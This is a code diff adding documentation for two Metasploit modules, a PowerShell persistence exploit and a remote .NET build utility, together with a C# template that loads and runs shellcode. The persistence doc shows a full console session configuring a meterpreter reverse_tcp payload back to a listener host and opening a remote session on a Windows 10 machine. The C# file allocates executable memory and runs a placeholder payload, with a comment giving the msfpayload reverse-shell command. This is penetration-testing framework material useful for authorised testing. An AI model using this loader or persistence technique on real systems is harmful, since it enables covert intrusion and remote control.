sempervictus
diff --git a/‎documentation/modules/exploit/windows/local/ps_persist.md
Lines changed: 63 additions & 0 deletions b/‎documentation/modules/exploit/windows/local/ps_persist.md
Lines changed: 63 additions & 0 deletions
diff --git a/‎documentation/modules/post/windows/manage/powershell/build_net_code.md
Lines changed: 77 additions & 0 deletions b/‎documentation/modules/post/windows/manage/powershell/build_net_code.md
Lines changed: 77 additions & 0 deletions
diff --git a/‎external/source/psh_exe/dot_net_exe.cs
Lines changed: 86 additions & 0 deletions b/‎external/source/psh_exe/dot_net_exe.cs
Lines changed: 86 additions & 0 deletions
@@ -0,0 +1,63 @@
+
+## Example Usage
+
+```
+msf exploit(handler) > use exploit/windows/local/ps_persist
+msf exploit(ps_persist) > set session -1
+session => -1
+msf exploit(ps_persist) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(ps_persist) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf exploit(ps_persist) > set lport 4445
+lport => 4445
+msf exploit(ps_persist) > show options
+
+Module options (exploit/windows/local/ps_persist):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   OUTPUT_TARGET                   no        Name and path of the generated executable, default random, omit extension
+   SESSION        -1               yes       The session to run this module on.
+   START_APP      true             no        Run EXE/Install Service
+   SVC_DNAME      MsfDynSvc        no        Display Name to use for the Windows Service
+   SVC_GEN        false            no        Build a Windows service, which defaults to running as localsystem
+   SVC_NAME       MsfDynSvc        no        Name to use for the Windows Service
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The listen address
+   LPORT     4445             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Universal
+
+
+msf exploit(ps_persist) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4445
+[+]  - Bytes remaining: 9664
+[+]  - Bytes remaining: 1664
+[+] Payload successfully staged.
+[*] Sending stage (957999 bytes) to 192.168.56.101
+[+] Finished!
+[*] Meterpreter session 2 opened (192.168.56.1:4445 -> 192.168.56.101:49974) at 2016-10-08 18:42:36 -0500
+
+meterpreter > sysinfo
+Computer        : DESKTOP-B8ALP1P
+OS              : Windows 10 (Build 14393).
+Architecture    : x64 (Current Process is WOW64)
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/win32
+```
+
@@ -0,0 +1,77 @@
+## Example Session
+
+/tmp/hello.cs contains the following:
+
+```
+using System;
+
+public class Hello
+{
+   public static void Main()
+   {
+      Console.WriteLine("Hello, World!");
+   }
+}
+```
+
+To build and run the code:
+
+```
+msf exploit(handler) > use post/windows/manage/powershell/build_net_code
+msf post(build_net_code) > set SESSION -1
+SESSION => -1
+msf post(build_net_code) > show options
+
+Module options (post/windows/manage/powershell/build_net_code):
+
+   Name           Current Setting                                            Required  Description
+   ----           ---------------                                            --------  -----------
+   ASSEMBLIES     mscorlib.dll, System.dll, System.Xml.dll, System.Data.dll  no        Any assemblies outside the defaults
+   CODE_PROVIDER  Microsoft.CSharp.CSharpCodeProvider                        yes       Code provider to use
+   COMPILER_OPTS  /optimize                                                  no        Options to pass to compiler
+   OUTPUT_TARGET                                                             no        Name and path of the generated binary, default random, omit extension
+   RUN_BINARY     false                                                      no        Execute the generated binary
+   SESSION        -1                                                         yes       The session to run this module on.
+   SOURCE_FILE                                                               yes       Path to source code
+
+msf post(build_net_code) > set SOURCE_FILE /tmp/hello.cs
+SOURCE_FILE => /tmp/hello.cs
+msf post(build_net_code) > run
+
+[*] Building remote code.
+[+] File C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe found, 3584kb
+[+] Finished!
+[*] Post module execution completed
+msf post(build_net_code) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 4840 created.
+Channel 7 created.
+Microsoft Windows [Version 10.0.14393]
+(c) 2016 Microsoft Corporation. All rights reserved.
+
+E:\metasploit-framework>C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe
+C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe
+Hello, World!
+```
+
+You can also run the code automatically:
+
+```
+msf exploit(handler) > use post/windows/manage/powershell/build_net_code
+msf post(build_net_code) > set SOURCE_FILE /tmp/hello.cs
+SOURCE_FILE => /tmp/hello.cs
+msf post(build_net_code) > set RUN_BINARY true
+RUN_BINARY => true
+msf post(build_net_code) > set SESSION -1
+SESSION => -1
+msf post(build_net_code) > run
+
+[*] Building remote code.
+[+] File C:\cygwin64\tmp\QuEQSEifJOe.exe found, 3584kb
+[+] Hello, World!
+
+[+] Finished!
+[*] Post module execution completed
+```
@@ -0,0 +1,86 @@
+using System;
+using System.Runtime.InteropServices;
+
+namespace Wrapper
+{
+    class Program
+    {
+        [Flags]
+        public enum AllocationType : uint
+        {
+            COMMIT = 0x1000,
+            RESERVE = 0x2000,
+            RESET = 0x80000,
+            LARGE_PAGES = 0x20000000,
+            PHYSICAL = 0x400000,
+            TOP_DOWN = 0x100000,
+            WRITE_WATCH = 0x200000
+        }
+
+        [Flags]
+        public enum MemoryProtection : uint
+        {
+            EXECUTE = 0x10,
+            EXECUTE_READ = 0x20,
+            EXECUTE_READWRITE = 0x40,
+            EXECUTE_WRITECOPY = 0x80,
+            NOACCESS = 0x01,
+            READONLY = 0x02,
+            READWRITE = 0x04,
+            WRITECOPY = 0x08,
+            GUARD_Modifierflag = 0x100,
+            NOCACHE_Modifierflag = 0x200,
+            WRITECOMBINE_Modifierflag = 0x400
+        }
+
+        public enum FreeType : uint
+        {
+            MEM_DECOMMIT = 0x4000,
+            MEM_RELEASE = 0x8000
+        }
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
+
+        [DllImport("kernel32.dll")]
+        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+
+        [DllImport("kernel32")]
+        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, FreeType dwFreeType);
+
+        [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
+        public delegate Int32 ExecuteDelegate();
+
+        static void Main()
+        {
+            // msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=<port> LHOST=<host> R| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
+            string shellcode = "MSF_PAYLOAD_SPACE";
+
+
+            byte[] sc = new byte[shellcode.Length];
+
+            for (int i = 0; i < shellcode.Length; i++)
+            {
+                sc[i] = Convert.ToByte(shellcode[i]);
+            }
+
+            // Allocate RWX memory for the shellcode
+            IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
+
+            try
+            {
+                // Copy shellcode to RWX buffer
+                Marshal.Copy(sc, 0, baseAddr, sc.Length);
+
+                // Get pointer to function created in memory
+                ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
+
+                del();
+            }
+            finally
+            {
+                VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
+            }
+        }
+    }
+}